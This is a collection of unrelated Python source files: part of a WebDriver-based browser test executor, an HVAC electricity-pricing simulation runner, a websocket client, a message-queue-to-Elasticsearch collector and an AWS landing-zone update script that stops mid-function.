except Exception:
pass
if test_window is None:
after = self.webdriver.handles
if len(after) == 2:
test_window = next(iter(set(after) - set([parent])))
elif after[0] == parent and len(after) > 2:
# Hope the first one here is the test window
test_window = after[1]
if test_window is not None:
assert test_window != parent
return test_window
time.sleep(0.1)
raise Exception("unable to find test window")
class WebDriverSelectorProtocolPart(SelectorProtocolPart):
def setup(self):
self.webdriver = self.parent.webdriver
def elements_by_selector(self, selector):
return self.webdriver.find.css(selector)
class WebDriverClickProtocolPart(ClickProtocolPart):
def setup(self):
self.webdriver = self.parent.webdriver
def element(self, element):
self.logger.info("click " + repr(element))
return element.click()
class WebDriverSendKeysProtocolPart(SendKeysProtocolPart):
def setup(self):
self.webdriver = self.parent.webdriver
def send_keys(self, element, keys):
try:
return element.send_keys(keys)
except client.UnknownErrorException as e:
# workaround https://bugs.chromium.org/p/chromedriver/issues/detail?id=1999
if (e.http_status != 500 or
e.status_code != "unknown error"):
raise
return element.send_element_command("POST", "value", {"value": list(keys)})
class WebDriverActionSequenceProtocolPart(ActionSequenceProtocolPart):
def setup(self):
self.webdriver = self.parent.webdriver
def send_actions(self, actions):
self.webdriver.actions.perform(actions['actions'])
class WebDriverTestDriverProtocolPart(TestDriverProtocolPart):
def setup(self):
self.webdriver = self.parent.webdriver
def send_message(self, message_type, status, message=None):
obj = {
"type": "testdriver-%s" % str(message_type),
"status": str(status)
}
if message:
obj["message"] = str(message)
self.webdriver.execute_script("window.postMessage(%s, '*')" % json.dumps(obj))
class WebDriverProtocol(Protocol):
implements = [WebDriverBaseProtocolPart,
WebDriverTestharnessProtocolPart,
WebDriverSelectorProtocolPart,
WebDriverClickProtocolPart,
WebDriverSendKeysProtocolPart,
WebDriverActionSequenceProtocolPart,
WebDriverTestDriverProtocolPart]
def __init__(self, executor, browser, capabilities, **kwargs):
super(WebDriverProtocol, self).__init__(executor, browser)
self.capabilities = capabilities
self.url = browser.webdriver_url
self.webdriver = None
def connect(self):
"""Connect to browser via WebDriver."""
self.logger.debug("Connecting to WebDriver on URL: %s" % self.url)
host, port = self.url.split(":")[1].strip("/"), self.url.split(':')[-1].strip("/")
capabilities = {"alwaysMatch": self.capabilities}
self.webdriver = client.Session(host, port, capabilities=capabilities)
self.webdriver.start()
def after_conect(self):
pass
def teardown(self):
self.logger.debug("Hanging up on WebDriver session")
try:
self.webdriver.quit()
except Exception:
pass
del self.webdriver
def is_alive(self):
try:
# Get a simple property over the connection
self.webdriver.window_handle
except (socket.timeout, client.UnknownErrorException):
return False
return True
def after_connect(self):
self.testharness.load_runner(self.executor.last_environment["protocol"])
class WebDriverRun(object):
def __init__(self, func, protocol, url, timeout):
self.func = func
self.result = None
self.protocol = protocol
self.url = url
self.timeout = timeout
self.result_flag = threading.Event()
def run(self):
timeout = self.timeout
try:
self.protocol.base.set_timeout((timeout + extra_timeout))
except client.UnknownErrorException:
self.logger.error("Lost WebDriver connection")
return Stop
executor = threading.Thread(target=self._run)
executor.start()
flag = self.result_flag.wait(timeout + 2 * extra_timeout)
if self.result is None:
if flag:
# flag is True unless we timeout; this *shouldn't* happen, but
# it can if self._run fails to set self.result due to raising
self.result = False, ("INTERNAL-ERROR", "self._run didn't set a result")
else:
self.result = False, ("EXTERNAL-TIMEOUT", None)
return self.result
def _run(self):
try:
self.result = True, self.func(self.protocol, self.url, self.timeout)
except (client.TimeoutException, client.ScriptTimeoutException):
self.result = False, ("EXTERNAL-TIMEOUT", None)
except (socket.timeout, client.UnknownErrorException):
self.result = False, ("CRASH", None)
except Exception as e:
if (isinstance(e, client.WebDriverException) and
e.http_status == 408 and
e.status_code == "asynchronous script timeout"):
# workaround for https://bugs.chromium.org/p/chromedriver/issues/detail?id=2001
self.result = False, ("EXTERNAL-TIMEOUT", None)
else:
message = str(getattr(e, "message", ""))
if message:
message += "\n"
message += traceback.format_exc(e)
self.result = False, ("INTERNAL-ERROR", message)
finally:
self.result_flag.set()
class WebDriverTestharnessExecutor(TestharnessExecutor):
supports_testdriver = True
def __init__(self, browser, server_config, timeout_multiplier=1,
close_after_done=True, capabilities=None, debug_info=None,
supports_eager_pageload=True, **kwargs):
"""WebDriver-based executor for testharness.js tests"""
TestharnessExecutor.__init__(self, browser, server_config,
timeout_multiplier=timeout_multiplier,
debug_info=debug_info)
self.protocol = WebDriverProtocol(self, browser, capabilities)
with open(os.path.join(here, "testharness_webdriver_resume.js")) as f:
self.script_resume = f.read()
self.close_after_done = close_after_done
self.window_id = str(uuid.uuid4())
self.supports_eager_pageload = supports_eager_pageload
def is_alive(self):
return self.protocol.is_alive()
def on_environment_change(self, new_environment):
if new_environment["protocol"] != self.last_environment["protocol"]:
self.protocol.testharness.load_runner(new_environment["protocol"])
def do_test(self, test):
url = self.test_url(test)
success, data = WebDriverRun(self.do_testharness,
self.protocol,
url,
test.timeout * self.timeout_multiplier).run()
if success:
return self.convert_result(test, data)
return (test.result_cls(*data), [])
def do_testharness(self, protocol, url, timeout):
format_map = {"url": strip_server(url)}
parent_window = protocol.testharness.close_old_windows()
# Now start the test harness
protocol.base.execute_script("window.open('about:blank', '%s', 'noopener')" % self.window_id)
test_window = protocol.testharness.get_test_window(self.window_id,
parent_window,
timeout=5*self.timeout_multiplier)
self.protocol.base.set_window(test_window)
handler = CallbackHandler(self.logger, protocol, test_window)
protocol.webdriver.url = url
if not self.supports_eager_pageload:
self.wait_for_load(protocol)
while True:
result = protocol.base.execute_script(
self.script_resume % format_map, async=True)
done, rv = handler(result)
if done:
break
return rv
def wait_for_load(self, protocol):
# pageLoadStrategy=eager doesn't work in Chrome so try to emulate in user script
loaded = False
seen_error = False
while not loaded:
try:
loaded = protocol.base.execute_script("""
var callback = arguments[arguments.length - 1];
if (location.href === "about:blank") {
callback(false);
} else if (document.readyState !== "loading") {
callback(true);
} else {
document.addEventListener("readystatechange", () => {if (document.readyState !== "loading") {callback(true)}});
}""", async=True)
except client.JavascriptErrorException:
# We can get an error here if the script runs in the initial about:blank
# document before it has navigated, with the driver returning an error
# indicating that the document was unloaded
if seen_error:
raise
seen_error = True
class WebDriverRefTestExecutor(RefTestExecutor):
def __init__(self, browser, server_config, timeout_multiplier=1,
screenshot_cache=None, close_after_done=True,
debug_info=None, capabilities=None, **kwargs):
"""WebDriver-based executor for reftests"""
RefTestExecutor.__init__(self,
browser,
server_config,
screenshot_cache=screenshot_cache,
timeout_multiplier=timeout_multiplier,
debug_info=debug_info)
self.protocol = WebDriverProtocol(self, browser,
capabilities=capabilities)
self.implementation = RefTestImplementation(self)
self.close_after_done = close_after_done
self.has_window = False
with open(os.path.join(here, "reftest.js")) as f:
self.script = f.read()
with open(os.path.join(here, "reftest-wait_webdriver.js")) as f:
self.wait_script = f.read()
def is_alive(self):
return self.protocol.is_alive()
def do_test(self, test):
self.protocol.webdriver.window.size = (600, 600)
result = self.implementation.run_test(test)
return self.convert_result(test, result)
def screenshot(self, test, viewport_size, dpi):
# https://github.com/w3c/wptrunner/issues/166
assert viewport_size is None
assert dpi is None
return WebDriverRun(self._screenshot,
self.protocol,
self.test_url(test),
test.timeout).run()
def _screenshot(self, protocol, url, timeout):
webdriver = protocol.webdriver
webdriver.url = url
webdriver.execute_async_script(self.wait_script)
screenshot = webdriver.screenshot()
# strip off the data:img/png, part of the url
if screenshot.startswith("data:image/png;base64,"):
screenshot = screenshot.split(",", 1)[1]
return screenshot
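

# Illustrative sketch (not part of the original module): WebDriverRun wraps a
# callable with the signature func(protocol, url, timeout) and returns a
# (success, data) tuple, where data is either the callable's return value or
# an (error-status, message) pair, as consumed by do_test() above.  The
# function below is a hypothetical example of reusing it from an executor
# that has a .protocol attribute and a test_url() helper.
def _example_timed_probe(executor, test):
    def probe(protocol, url, timeout):
        # navigate to the test URL and report the document title
        protocol.webdriver.url = url
        return protocol.webdriver.execute_script("return document.title;")

    return WebDriverRun(probe,
                        executor.protocol,
                        executor.test_url(test),
                        test.timeout * executor.timeout_multiplier).run()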
|
HVAC2.py
|
"""
Run a large number of simulations for the HVAC model.
Results from these simulations are reported in:
C. Campaigne, M. Balandat and L. Ratliff: Welfare Effects
of Dynamic Electricity Pricing. In preparation.
@author: Maximilian Balandat
@date Sep 23, 2017
"""
# import packages and set up things
import os
import multiprocessing as mp
import pandas as pd
import logging
import logging.handlers
import logging.config
from datetime import datetime
from pyDR.simulation import get_internal_gains, log_config, simulate_HVAC, max_cool
############################################################################
# Setup
DATA_PATH = "PATH_TO_PYDR_DATA"
LOG_PATH = "PATH_TO_LOGS"
RESULTS_PATH = "PATH_TO_RESULTS"
# location of data files (available for download at
# https://www.ocf.berkeley.edu/~balandat/pyDR_data.zip)
data_file = os.path.join(DATA_PATH, "data_complete.csv")
# location of the log file
log_file = os.path.join(LOG_PATH, "HVAC_sim.log")
# directory for GUROBI log files
GRB_logdir = os.path.join(LOG_PATH, "GRB_logs")
# location of the result file
result_file = os.path.join(RESULTS_PATH, "results.csv")
# folder for output files (Attention: If not none then this will
# save a few GB of .pickle files)
output_folder = None
############################################################################
# read in data
data = pd.read_csv(data_file, parse_dates=['timestamp_GMT'],
index_col='timestamp_GMT').tz_convert('GMT')
data = data.resample('1H').mean()
# Define model and simulation parameters
# generate copies of input data for parallelization
sim_ranges = [[datetime(2012, 1, 1), datetime(2012, 12, 31)],
[datetime(2013, 1, 1), datetime(2013, 12, 31)],
[datetime(2014, 1, 1), datetime(2014, 12, 31)]]
sim_tariffs = ['Zero', 'OptFlat', 'A1', 'A1TOU', 'A6TOU', 'A10_secondary',
'A10TOU_secondary', 'E19TOU_secondary']
sim_nodes = ['PGCC', 'PGEB', 'PGF1', 'PGP2', 'PGSA']
n_DR = [75]
n_ranges = len(sim_ranges)
# generate scaled sub-DataFrame
data_sim = pd.concat(
[data[[node+'_temp']] for node in sim_nodes] +
[data[[node+'_solar']] for node in sim_nodes] +
[data[[node+'_LMP']] for node in sim_nodes] +
[get_internal_gains(data.index)], axis=1)
# generate a list of DataFrames of different ranges for parallelization
data_par = []
for (start_date, end_date) in sim_ranges:
ts_start = pd.Timestamp(start_date, tz='US/Pacific')
ts_end = pd.Timestamp(end_date, tz='US/Pacific')
data_par.append(
data_sim[(data_sim.index >= ts_start) & (data_sim.index <= ts_end)]
)
# configure logger
logging.config.dictConfig(log_config(log_file))
log_queue = mp.Queue(-1)
root = logging.getLogger()
ql = logging.handlers.QueueListener(log_queue, *root.handlers)
# start root logging via queue listener
ql.start()
root.log(logging.INFO, 'Starting simulation.')
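
# Illustrative note (assumption): the worker processes started below receive
# log_queue and are expected to push their log records onto it so that the
# QueueListener above writes them out through the root handlers.  Inside
# simulate_HVAC this presumably looks roughly like the sketch below; the
# helper is defined here only for illustration and is never called.
def _worker_logging_sketch(record_queue):
    worker_root = logging.getLogger()
    worker_root.setLevel(logging.INFO)
    # replace any inherited handlers with a single QueueHandler
    worker_root.handlers = [logging.handlers.QueueHandler(record_queue)]
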
results = []
# start simulating
with mp.Manager() as mngr:
result_queue = mngr.Queue(-1)
sim_workers = []
for i in range(n_ranges):
sim_worker = mp.Process(
target=simulate_HVAC, name='sim_worker {}'.format(i),
args=(i, log_queue, result_queue, data_par[i],
sim_nodes, sim_tariffs, n_DR),
            kwargs={'GRB_logfile': os.path.join(GRB_logdir, 'GRB_{}.log'.format(i)),
'expMA': False, 'carbon': True, 'MIPGap': 1e-6,
'TimeLimit': 2000, 'output_folder': output_folder,
'max_cool': max_cool})
sim_workers.append(sim_worker)
sim_worker.start()
# wait for all worker processes to finish
for sw in sim_workers:
sw.join()
root.log(logging.DEBUG, 'Extracting results.')
# extract results
for i in range(n_ranges):
results.append(result_queue.get())
# save results
root.log(logging.DEBUG, 'Saving results to disk.')
results = pd.concat(results, ignore_index=True)
results.to_csv(result_file, index=False)
# stop logging
root.log(logging.INFO, 'Simulation completed.')
ql.stop()
|
client.py
|
from . import log
logger = log.get(__name__)
from .utils import delay
import websocket
import json
import threading
from . import environment
class Client():
def __init__(self, handler):
logger.info('Constructing.')
self._handler = handler
self.ws = None
self.isClosed = False
websocket.enableTrace(False)
self._connect()
def close(self):
self.isClosed = True
if self.ws is not None:
self.ws.close()
def _connect(self):
if self.ws is not None:
return
if self.isClosed:
return
url = environment.get('BERLIOZ_AGENT_PATH')
logger.info('Connecting to agent %s...', url)
ws = websocket.WebSocketApp(url,
on_message = self._onMessage,
on_error = self._onError,
on_close = self._onClose)
ws.on_open = self._onOpen
ws_thread = threading.Thread(target=ws.run_forever)
ws_thread.daemon = True
self.ws = ws
ws_thread.start()
def _onMessage(self, ws, message):
        if ws is not self.ws:
return
logger.info('Message received.')
logger.debug('Message RAW contents: %s', message)
data = json.loads(message)
logger.debug('Message JSON Contents: %s', data)
self._handler(data)
logger.info('Message processed.')
def _onError(self, ws, error):
logger.error('Error')
logger.error(error)
ws.close()
def _onClose(self, ws):
logger.info('Closed')
self.ws = None
self._reconnect()
def _onOpen(self, ws):
logger.info('Opened')
def _reconnect(self):
if self.isClosed:
return
delay(1000, self._connect)
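

# Illustrative sketch (assumption): the delay() helper imported from .utils is
# not shown in this file.  Judging from the call above -- delay(1000,
# self._connect) -- it schedules a callback after a number of milliseconds
# without blocking the caller; a minimal implementation could look like this.
def _example_delay(ms, fn):
    timer = threading.Timer(ms / 1000.0, fn)  # milliseconds -> seconds
    timer.daemon = True                       # do not keep the process alive
    timer.start()
    return timer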
|
collector.py
|
import socket
import threading
from threading import Thread
import time
import os
import sys
import stomp
import traceback
from elasticsearch import Elasticsearch, exceptions as es_exceptions
from elasticsearch import helpers
from datetime import datetime
import urllib3.exceptions
import hashlib
try:
import queue
except ImportError:
import Queue as queue
import siteMapping
class Collector(object):
class MyListener(object):
def __init__(self, q, collector):
self.q = q
self.collector = collector
def on_message(self, headers, message):
self.q.put([message, headers])
def on_error(self, headers, message):
print('received an error %s' % message)
os._exit(1)
def on_heartbeat_timeout(self):
print('AMQ - lost heartbeat. Needs a reconnect!')
self.collector.connect_to_MQ(reset=True)
def on_disconnected(self):
print('AMQ - no connection. Needs a reconnect!')
self.collector.connect_to_MQ(reset=True)
def __init__(self):
siteMapping.reload()
# MQ connection
self.connection = None
self.q = queue.Queue()
self.RMQ_parameters = self.get_RMQ_connection_parameters()
self.es_index_prefix = os.environ.get("ES_INDEX_PREFIX", "")
self.aLotOfData = []
self.last_flush = time.time()
self.last_headers = None
self.es_conn = None
self.msg_counter = 0
def start(self):
# start eventCreator threads
self.t = Thread(target=self.watchMessages)
self.t.daemon = True
self.t.start()
while True:
self.connect_to_MQ()
time.sleep(55)
print(datetime.now().strftime("%Y-%m-%d %H:%M:%S"), "threads:", threading.active_count(), "qsize:", self.q.qsize())
def watchMessages(self):
"""
Managing creating and sending messages
"""
while True:
try:
(msg, headers) = self.q.get(timeout=10)
self.msg_counter += 1
except queue.Empty as qe:
# Try to flush the data
self.flushData()
continue
try:
self.eventCreator(msg)
except Exception as e:
# Failed to create the event
traceback.print_exc()
print("Failed to parse data:")
print(str(msg))
# Set the last successful headers
self.last_headers = headers
self.flushData()
self.q.task_done()
def flushData(self):
"""
Flush the data, if it's time
"""
if self.aLotOfData is None or len(self.aLotOfData) == 0:
if self.msg_counter > 100 or (time.time() - self.last_flush) > 10:
if self.last_headers:
self.connection.ack(self.last_headers['message-id'], self.RMQ_parameters['RMQ_ID'])
self.last_headers = None
self.last_flush = time.time()
self.msg_counter = 0
return
if len(self.aLotOfData) > 100 or (time.time() - self.last_flush) > 10 or self.msg_counter > 100:
success = False
while not success:
success = self.bulk_index(self.aLotOfData, es_conn=None, thread_name=threading.current_thread().name)
if success is True:
self.aLotOfData = []
if self.last_headers:
self.connection.ack(self.last_headers['message-id'], self.RMQ_parameters['RMQ_ID'])
self.last_headers = None
self.last_flush = time.time()
self.msg_counter = 0
break
else:
print("Unable to post to ES")
time.sleep(10)
    def eventCreator(self, message):
        # to be overridden by concrete collectors: turn a raw message into
        # Elasticsearch bulk actions appended to self.aLotOfData
        pass
def connect_to_MQ(self, reset=False):
if self.connection is not None:
if reset and self.connection.is_connected():
self.connection.disconnect()
self.connection = None
            elif self.connection.is_connected():
return
print("connecting to MQ")
self.connection = None
addresses = socket.getaddrinfo('clever-turkey.rmq.cloudamqp.com', 61614)
ip = addresses[0][4][0]
host_and_ports = [(ip, 61614)]
print(host_and_ports)
self.connection = stomp.Connection(
host_and_ports=host_and_ports,
use_ssl=True,
vhost=self.RMQ_parameters['RMQ_VHOST']
)
self.connection.set_listener('MyConsumer', Collector.MyListener(self.q, self))
self.connection.connect(self.RMQ_parameters['RMQ_USER'], self.RMQ_parameters['RMQ_PASS'], wait=True, heartbeats=(10000, 10000))
self.connection.subscribe(destination=self.TOPIC, ack='client', id=self.RMQ_parameters['RMQ_ID'], headers={"durable": True, "auto-delete": False, 'prefetch-count': 1024})
def get_es_connection(self):
"""
establishes es connection.
"""
print("make sure we are connected to ES...")
while True:
try:
es_host = None
http_auth = None
if 'ES_HOST' in os.environ:
es_host = os.environ["ES_HOST"]
else:
es_host = "atlas-kibana.mwt2.org:9200"
if 'ES_USER' in os.environ and 'ES_PASS' in os.environ:
http_auth = (os.environ['ES_USER'], os.environ['ES_PASS'])
self.es_conn = Elasticsearch([es_host], http_auth=http_auth)
else:
self.es_conn = Elasticsearch([es_host])
print("connected OK!")
except es_exceptions.ConnectionError as error:
print('ConnectionError in get_es_connection: ', error)
except:
print('Something seriously wrong happened in getting ES connection.')
else:
return self.es_conn
time.sleep(70)
def bulk_index(self, data, es_conn=None, thread_name=''):
"""
sends the data to ES for indexing.
if successful returns True.
"""
success = False
if self.es_conn is None:
self.es_conn = self.get_es_connection()
try:
res = helpers.bulk(self.es_conn, data, raise_on_exception=True, request_timeout=120)
print(thread_name, "inserted:", res[0], 'errors:', res[1])
success = True
except es_exceptions.ConnectionError as error:
print('ConnectionError ', error)
except es_exceptions.TransportError as error:
print('TransportError ', error)
except helpers.BulkIndexError as error:
print(error)
except Exception as e:
traceback.print_exc()
print('Something seriously wrong happened.')
# Reset the ES connection
self.es_conn = None
return success
def get_RMQ_connection_parameters(self):
""" read vhost, user, pass from the environment """
ret = {'RMQ_VHOST': '', 'RMQ_USER': '', 'RMQ_PASS': '', 'RMQ_ID': ''}
for var in ret:
            val = os.environ.get(var)
if val:
ret[var] = val
else:
print('environment variable', var, 'not defined. Exiting.')
sys.exit(1)
return ret
def calculateId(self, message, timestamp):
"""
Calculate the Id from the message and return it.
Version 1 (or no version):
- timestamp
- org_metadata_key
Version 2:
- timestamp
- source
- dest
- test type
"""
        if 'version' in message and message['version'] == 2:  # Should we use a semver library?
sha1_hash = hashlib.sha1()
sha1_hash.update(message['meta']['source'].encode('utf-8'))
sha1_hash.update(message['meta']['destination'].encode('utf-8'))
sha1_hash.update(self.TOPIC.encode('utf-8'))
sha1_hash.update(str(timestamp).encode('utf-8'))
return sha1_hash.hexdigest()
else:
sha1_hash = hashlib.sha1()
sha1_hash.update(message['meta']['org_metadata_key'].encode())
sha1_hash.update(str(timestamp).encode())
return sha1_hash.hexdigest()
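

# Illustrative sketch (assumption): Collector is meant to be subclassed.  A
# concrete collector must provide TOPIC (the STOMP destination to subscribe
# to) and override eventCreator() to turn each raw message into Elasticsearch
# bulk actions appended to self.aLotOfData; flushData() then ships them and
# acks the broker.  The names below are hypothetical.
class ExampleCollector(Collector):

    TOPIC = '/topic/example.measurements'

    def eventCreator(self, message):
        # a real collector would parse the payload (usually JSON) into a
        # document; here the raw message is stored as-is for illustration
        self.aLotOfData.append({
            '_index': self.es_index_prefix + 'example',
            '_source': {
                'raw': message,
                'collected_at': datetime.utcnow().isoformat()
            }
        })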
|
EC-Update-LZ.py
|
#!/usr/bin/python
import sys, getopt
import subprocess, pkg_resources
import os
import shlex
import logging
import time
import boto3
import json
import zipfile
import threading
import cursor
import yaml
from cfn_tools import load_yaml, dump_yaml
from zipfile import ZipFile
from datetime import datetime
from enum import Enum
from colorama import Fore, Back, Style
from botocore.exceptions import BotoCoreError, ClientError, ProfileNotFound
from botocore.config import Config
account_id = ''
stacks = { 'SECLZ-Cloudtrail-KMS' : { 'Template' : 'CFN/EC-lz-Cloudtrail-kms-key.yml' } ,
'SECLZ-LogShipper-Lambdas-Bucket' : { 'Template' : 'CFN/EC-lz-s3-bucket-lambda-code.yml' } ,
'SECLZ-LogShipper-Lambdas' : { 'Template' : 'CFN/EC-lz-logshipper-lambdas.yml' } ,
'SECLZ-Central-Buckets' : { 'Template' : 'CFN/EC-lz-s3-buckets.yml'} ,
'SECLZ-Iam-Password-Policy' : { 'Template' : 'CFN/EC-lz-iam-setting_password_policy.yml', 'Linked':True } ,
'SECLZ-config-cloudtrail-SNS' : { 'Template' : 'CFN/EC-lz-config-cloudtrail-logging.yml', 'Linked':True } ,
'SECLZ-Guardduty-detector' : { 'Template' : 'CFN/EC-lz-guardDuty-detector.yml', 'Linked':True } ,
'SECLZ-SecurityHub' : { 'Template' : 'CFN/EC-lz-securityHub.yml', 'Linked':True } ,
'SECLZ-Notifications-Cloudtrail' : { 'Template' : 'CFN/EC-lz-notifications.yml', 'Linked':True } ,
'SECLZ-CloudwatchLogs-SecurityHub' : { 'Template' : 'CFN/EC-lz-config-securityhub-logging.yml' } ,
'SECLZ-local-SNS-topic' : { 'Template' : 'CFN/EC-lz-local-config-SNS.yml', 'Linked':True} }
stacksets = { 'SECLZ-Enable-Config-SecurityHub-Globally' : { 'Template' : 'CFN/EC-lz-Config-SecurityHub-all-regions.yml' } ,
'SECLZ-Enable-Guardduty-Globally' : { 'Template' : 'CFN/EC-lz-Config-Guardduty-all-regions.yml' } }
tags = []
all_regions = ["ap-northeast-1","ap-northeast-2","ap-northeast-3","ap-south-1","ap-southeast-1","ap-southeast-2","ca-central-1","eu-central-1","eu-north-1","eu-west-1", "eu-west-2","eu-west-3","sa-east-1","us-east-1","us-east-2","us-west-1","us-west-2"]
def main(argv):
    global tags, all_regions
start_time = time.time()
manifest = ''
profile = ''
org_account='246933597933'
has_profile = False
verbosity = logging.ERROR
ssm_actions = []
stack_actions = []
securityhub_actions = []
stacksets_actions = []
    cis_actions = []
    accounts = {'include': [], 'exclude': []}
    version = None
boto3_config = Config(
retries = dict(
max_attempts = 10
)
)
sys.stdout = Unbuffered(sys.stdout)
try:
        opts, args = getopt.getopt(argv, "hvm:s:o:", ["manifest=", "seclog=", "org=", "verbose"])
except getopt.GetoptError:
usage()
sys.exit(2)
print("#######")
print("####### AWS Landing Zone update script")
print("")
# Parsing script parameters
for opt, arg in opts:
if opt == '-h':
usage()
sys.exit()
elif opt in ("-m", "--manifest"):
if (arg == ''):
print(f"Manifest has not been provided. [{Status.FAIL.value}]")
print("Exiting...")
sys.exit(1)
else:
try:
with open(arg) as f:
manifest = json.load(f)
except FileNotFoundError as err:
print(f"Manifest file not found : {err.strerror} [{Status.FAIL.value}]")
print("Exiting...")
sys.exit(1)
                except json.JSONDecodeError:
print("fManifest file {arg} is not a valid json [{Status.FAIL.value}]")
print("Exiting...")
sys.exit(1)
elif opt in ("-o", "--org"):
print(f"Using Organization account : {arg}")
org_account = arg
elif opt in ("-s", "--seclog"):
profiles = arg.split(',')
has_profile = True
if len(profiles) > 1:
print(f"Multiple AWS profiles delected : {profiles}")
elif opt in ("-v", "--verbose"):
verbosity = logging.DEBUG
try:
with open('CFN/EC-lz-TAGS.json') as f:
tags = json.load(f)
except FileNotFoundError as err:
print(f"Tag file not found : {err.strerror} [{Status.FAIL.value}]")
print("Exiting...")
sys.exit(1)
    except json.JSONDecodeError:
        print(f"Tag file CFN/EC-lz-TAGS.json is not a valid json [{Status.FAIL.value}]")
print("Exiting...")
sys.exit(1)
if 'tags' in manifest:
tags = merge_tags(tags, manifest['tags'])
logging.basicConfig(level=verbosity)
p = 0
loop = True
while loop:
if has_profile:
if p < len(profiles):
profile = profiles[p]
p=p+1
try:
print(f"Using AWS profile : {profile}")
boto3.setup_default_session(profile_name=profile)
get_account_id(True)
except ProfileNotFound as err:
print(f"{err} [{Status.FAIL.value}]")
print("Exiting...")
sys.exit(1)
else:
break
else:
loop = False
if (is_seclog() == False):
print(f"Not a SECLOG account. [{Status.FAIL.value}]")
print("Exiting...")
sys.exit(1)
print(f"SECLOG account identified. [{Status.OK.value}]")
print("")
linked_accounts = get_linked_accounts()
if not null_empty(manifest, 'stacks'):
stack_actions = manifest['stacks']
if not null_empty(manifest, 'version'):
version = manifest['version']
if not null_empty(manifest, 'stacksets'):
stacksets_actions = manifest['stacksets']
if not null_empty(manifest, 'ssm'):
ssm_actions = manifest['ssm']
if not null_empty(manifest, 'cis'):
all_regions = manifest['regions']
cis_actions = manifest['cis']
if not null_empty(manifest, 'regions'):
all_regions = manifest['regions']
if not null_empty(manifest, 'accounts'):
accounts = manifest['accounts']
if not null_empty(manifest, 'securityhub'):
securityhub_actions = manifest['securityhub']
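
    # For reference, an illustrative manifest layout inferred from the keys
    # read above (an assumption -- only the top-level keys and the 'value',
    # 'tags', 'include'/'exclude' and 'enable' fields are actually used in
    # this file; whatever else the do_update()/get_params() helpers expect is
    # not shown here):
    #
    # {
    #   "version": "...",
    #   "regions": ["eu-west-1", "..."],
    #   "accounts": {"include": [], "exclude": []},
    #   "ssm": {"seclog-ou": {"value": "...", "tags": true}, "...": {}},
    #   "stacks": {"SECLZ-Cloudtrail-KMS": {}, "...": {}},
    #   "stacksets": {"SECLZ-Enable-Guardduty-Globally": {}, "...": {}},
    #   "securityhub": {"multiregion-findings": {"enable": true}},
    #   "cis": [],
    #   "tags": []
    # }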
seclog_status = Execution.NO_ACTION
#update seclog stacks
if len(accounts['exclude']) > 0 and account_id in accounts['exclude']:
print(f"Skipping SECLOG account {account_id}")
else:
print(f"Updating SECLOG account {account_id}")
print("")
if ssm_actions:
cfnssm = boto3.client('ssm')
#update SSM parameters
if do_update(ssm_actions, 'seclog-ou') and seclog_status != Execution.FAIL:
result=update_ssm_parameter(cfnssm, '/org/member/SecLogOU', ssm_actions['seclog-ou']['value'])
                if result == Execution.OK:
                    will_update(stack_actions,'SECLZ-config-cloudtrail-SNS')
                if result != Execution.NO_ACTION:
                    seclog_status = result
#add tags
if 'tags' in ssm_actions['seclog-ou'] and ssm_actions['seclog-ou']['tags'] == True:
seclog_status = add_tags_parameter(cfnssm, '/org/member/SecLogOU')
if do_update(ssm_actions, 'notification-mail') and seclog_status != Execution.FAIL:
result=update_ssm_parameter(cfnssm, '/org/member/SecLog_notification-mail', ssm_actions['notification-mail']['value'])
if result == Execution.OK:
will_update(stack_actions,'SECLZ-config-cloudtrail-SNS')
if result != Execution.NO_ACTION:
seclog_status = result
#add tags
if 'tags' in ssm_actions['notification-mail'] and ssm_actions['notification-mail']['tags'] == True:
seclog_status = add_tags_parameter(cfnssm, '/org/member/SecLog_notification-mail')
if do_update(ssm_actions, 'cloudtrail-groupname') and seclog_status != Execution.FAIL:
result=update_ssm_parameter(cfnssm, '/org/member/SecLog_cloudtrail-groupname', ssm_actions['cloudtrail-groupname']['value'])
if result == Execution.OK:
will_update(stack_actions,'SECLZ-config-cloudtrail-SNS')
will_update(stack_actions,'SECLZ-LogShipper-Lambdas')
will_update(stack_actions,'SECLZ-Notifications-Cloudtrail')
if result != Execution.NO_ACTION:
seclog_status = result
#add tags
if 'tags' in ssm_actions['cloudtrail-groupname'] and ssm_actions['cloudtrail-groupname']['tags'] == True:
seclog_status = add_tags_parameter(cfnssm, '/org/member/SecLog_cloudtrail-groupname')
if do_update(ssm_actions, 'insight-groupname') and seclog_status != Execution.FAIL:
result=update_ssm_parameter(cfnssm, '/org/member/SecLog_insight-groupname', ssm_actions['insight-groupname']['value'])
                if result == Execution.OK:
                    will_update(stack_actions,'SECLZ-config-cloudtrail-SNS')
                    will_update(stack_actions,'SECLZ-LogShipper-Lambdas')
                if result != Execution.NO_ACTION:
                    seclog_status = result
#add tags
if 'tags' in ssm_actions['insight-groupname'] and ssm_actions['insight-groupname']['tags'] == True:
seclog_status = add_tags_parameter(cfnssm, '/org/member/SecLog_insight-groupname')
if do_update(ssm_actions, 'guardduty-groupname') and seclog_status != Execution.FAIL:
for reg in all_regions:
cfnssm = boto3.client('ssm', region_name=reg)
result=update_ssm_parameter(cfnssm, '/org/member/SecLog_guardduty-groupname', ssm_actions['guardduty-groupname']['value'], reg)
if result == Execution.OK:
will_update(stack_actions,'SECLZ-Guardduty-detector')
will_update(stacksets_actions,'SECLZ-Enable-Guardduty-Globally')
if result != Execution.NO_ACTION:
seclog_status = result
cfnssm = boto3.client('ssm')
#add tags
                if 'tags' in ssm_actions['guardduty-groupname'] and ssm_actions['guardduty-groupname']['tags'] == True:
for reg in all_regions:
cfnssm = boto3.client('ssm', region_name=reg)
seclog_status = add_tags_parameter(cfnssm, '/org/member/SecLog_guardduty-groupname', reg)
cfnssm = boto3.client('ssm')
if do_update(ssm_actions, 'securityhub-groupname') and seclog_status != Execution.FAIL:
result=update_ssm_parameter(cfnssm, '/org/member/SecLog_securityhub-groupname', ssm_actions['securityhub-groupname']['value'])
if result == Execution.OK:
will_update(stack_actions,'SECLZ-CloudwatchLogs-SecurityHub')
if result != Execution.NO_ACTION:
seclog_status = result
#add tags
if 'tags' in ssm_actions['securityhub-groupname'] and ssm_actions['securityhub-groupname']['tags'] == True:
seclog_status = add_tags_parameter(cfnssm, '/org/member/SecLog_securityhub-groupname')
if do_update(ssm_actions, 'config-groupname') and seclog_status != Execution.FAIL:
result=update_ssm_parameter(cfnssm, '/org/member/SecLog_config-groupname', ssm_actions['config-groupname']['value'])
if result == Execution.OK:
will_update(stack_actions,'SECLZ-config-cloudtrail-SNS')
will_update(stack_actions,'SECLZ-LogShipper-Lambdas')
if result != Execution.NO_ACTION:
seclog_status = result
#add tags
if 'tags' in ssm_actions['config-groupname'] and ssm_actions['config-groupname']['tags'] == True:
